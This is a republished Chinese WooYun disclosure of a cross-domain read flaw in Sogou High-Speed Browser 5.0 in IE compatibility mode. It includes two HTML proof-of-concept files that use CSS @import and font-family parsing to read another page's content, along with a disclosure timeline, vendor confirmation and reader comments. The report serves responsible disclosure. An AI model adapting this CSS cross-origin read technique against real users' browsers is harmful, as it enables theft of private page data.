搜狗高速浏览器最新版5.0及以下版本存在跨域漏洞

admin 2015年4月19日00:40:43评论468 views字数 2376阅读7分55秒阅读模式
摘要

2014-07-03: 细节已通知厂商并且等待厂商处理中
2014-07-07: 厂商已经确认,细节仅向厂商公开
2014-07-10: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2014-08-31: 细节向核心白帽子及相关领域专家公开
2014-09-10: 细节向普通白帽子公开
2014-09-20: 细节向实习白帽子公开
2014-10-01: 细节向公众公开

漏洞概要 关注数(15) 关注此漏洞

缺陷编号: WooYun-2014-66627

漏洞标题: 搜狗高速浏览器最新版5.0及以下版本存在跨域漏洞 搜狗高速浏览器最新版5.0及以下版本存在跨域漏洞

相关厂商: 搜狗

漏洞作者: 从容

提交时间: 2014-07-03 12:56

公开时间: 2014-10-01 12:58

漏洞类型: 权限提升

危害等级: 中

自评Rank: 10

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 浏览器漏洞 浏览器漏洞利用技巧 浏览器漏洞利用

0人收藏

漏洞详情

披露状态:

2014-07-03: 细节已通知厂商并且等待厂商处理中
2014-07-07: 厂商已经确认,细节仅向厂商公开
2014-07-10: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-08-31: 细节向核心白帽子及相关领域专家公开
2014-09-10: 细节向普通白帽子公开
2014-09-20: 细节向实习白帽子公开
2014-10-01: 细节向公众公开

简要描述:

搜狗高速浏览器最新版5.0及以下版本存在跨域漏洞

详细说明:

下载搜狗高速浏览器5.0

code 区域
http://**.**.**.**/

搜狗高速浏览器一直都是都是基于IE内核的浏览器

问题发生在CSS Parse的过程中,将fontFamily后面的内容当做了value,从而就可以实现跨域- -.

漏洞证明:

构造两个测试跨域的POC:

test1.html

code 区域
<html>
 
  <head>
 
   <title>test1</title>
 
   </head>
 
   <body>
 
    {}body{font-family:
 
    WooYun
 
    </body>
 
  </html>

test2.html

code 区域
<html>
 
  <head>
 
   <title>test2</title>
 
   </head>
 
   <body>
 
    <style>
 
     @import url("C:/Users/Administrator/Desktop/test1.html");
 
     </style>
 
     <script>
 
      setTimeout(function(){
 
       var t = document.body.currentStyle.fontFamily;
 
       alert(t);
 
      },2000);
 
      </script>
 
    </body>
 
 </html>

用搜狗高速浏览器5.0访问test2.html

但是一定要更换为IE兼容模式

搜狗高速浏览器最新版5.0及以下版本存在跨域漏洞

因为这是IE内核浏览器存在的漏洞...

搜狗高速浏览器最新版5.0及以下版本存在跨域漏洞

成功实现跨域读取test1.html中的内容...

5.0以下的版本我就不发图了,因为确实存在,这是搜狗高速浏览器模式的特性,各个版本都有IE兼容模式的...

在test2.html test.html 为CSS文件,渲染进入当前DOM,同时通过 document.body.currentStyle.fontFamily 访问此内容,问题发生在CSS Parse的过程中,将fontFamily后面的内容当做了value,从而读出了test1.html的页面内容.

修复方案:

补丁

搜狗高速浏览器最新版5.0及以下版本存在跨域漏洞

版权声明:转载请注明来源 从容@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2014-07-07 16:09

厂商回复:

感谢支持,欢迎到SGSRC报告漏洞

最新状态:

暂无


 

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

 

登陆后才能进行评分


评价

  1. 2014-07-03 13:10 | 梧桐雨 搜狗高速浏览器最新版5.0及以下版本存在跨域漏洞 ( 核心白帽子 | Rank:1662 漏洞数:191 | 学无止境)

    0

    mark关注一下

  2. 2014-07-03 13:31 | 90sid ( 路人 | Rank:2 漏洞数:1 | (*^__^*))

    0

    mark

  3. 2014-07-03 18:56 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 哇啦啦啦啦啦 我的宝贝 | ..)

    0

    @梧桐雨 大牛.....

  4. 2014-07-05 01:16 | xsser 搜狗高速浏览器最新版5.0及以下版本存在跨域漏洞 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)

    0

    怀疑误报 本地跨域是允许的 @疯狗

  5. 2014-07-07 16:17 | 小川 搜狗高速浏览器最新版5.0及以下版本存在跨域漏洞 ( 核心白帽子 | Rank:1627 漏洞数:241 | 一个致力要将乌云变成搞笑论坛的男人)

    0

    mark

  6. 2014-07-07 16:30 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 哇啦啦啦啦啦 我的宝贝 | ..)

    0

    @xsser 方总…搜狗确认了…

  7. 2014-07-07 18:28 | 小胖胖要减肥 搜狗高速浏览器最新版5.0及以下版本存在跨域漏洞 ( 普通白帽子 | Rank:686 漏洞数:101 )

    0

    @xsser 搜狗平台太太太太坑爹了

  8. 2014-07-07 19:38 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 哇啦啦啦啦啦 我的宝贝 | ..)

    0

    @小胖胖要减肥 还行吧,还是挺在乎白帽子的

  9. 2014-07-07 20:39 | 小胖胖要减肥 搜狗高速浏览器最新版5.0及以下版本存在跨域漏洞 ( 普通白帽子 | Rank:686 漏洞数:101 )

    0

    @从容 分数坑爹,态度蛮好的

  10. 2014-07-07 20:54 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 哇啦啦啦啦啦 我的宝贝 | ..)

    0

    @小胖胖要减肥 重在参与

  11. 2014-07-08 00:52 | 小胖胖要减肥 搜狗高速浏览器最新版5.0及以下版本存在跨域漏洞 ( 普通白帽子 | Rank:686 漏洞数:101 )

    0

    @从容 还是wooyun好 一样发现问题,wb更实惠

  12. 2014-07-08 10:48 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 哇啦啦啦啦啦 我的宝贝 | ..)

    0

    @小胖胖要减肥 是啊,还能认识这么多大手子~

  13. 2014-10-01 17:40 | 魂淡、 ( 路人 | Rank:17 漏洞数:2 | 么么哒)

    0

    居然认了。。。360直接忽略啊。其实我也感觉不算厂商的= =

  14. 2014-10-01 19:10 | 晏子 ( 路人 | Rank:6 漏洞数:4 | 无)

    0

    mark

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2015年4月19日00:40:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   搜狗高速浏览器最新版5.0及以下版本存在跨域漏洞https://cn-sec.com/archives/16495.html

发表评论

匿名网友 填写信息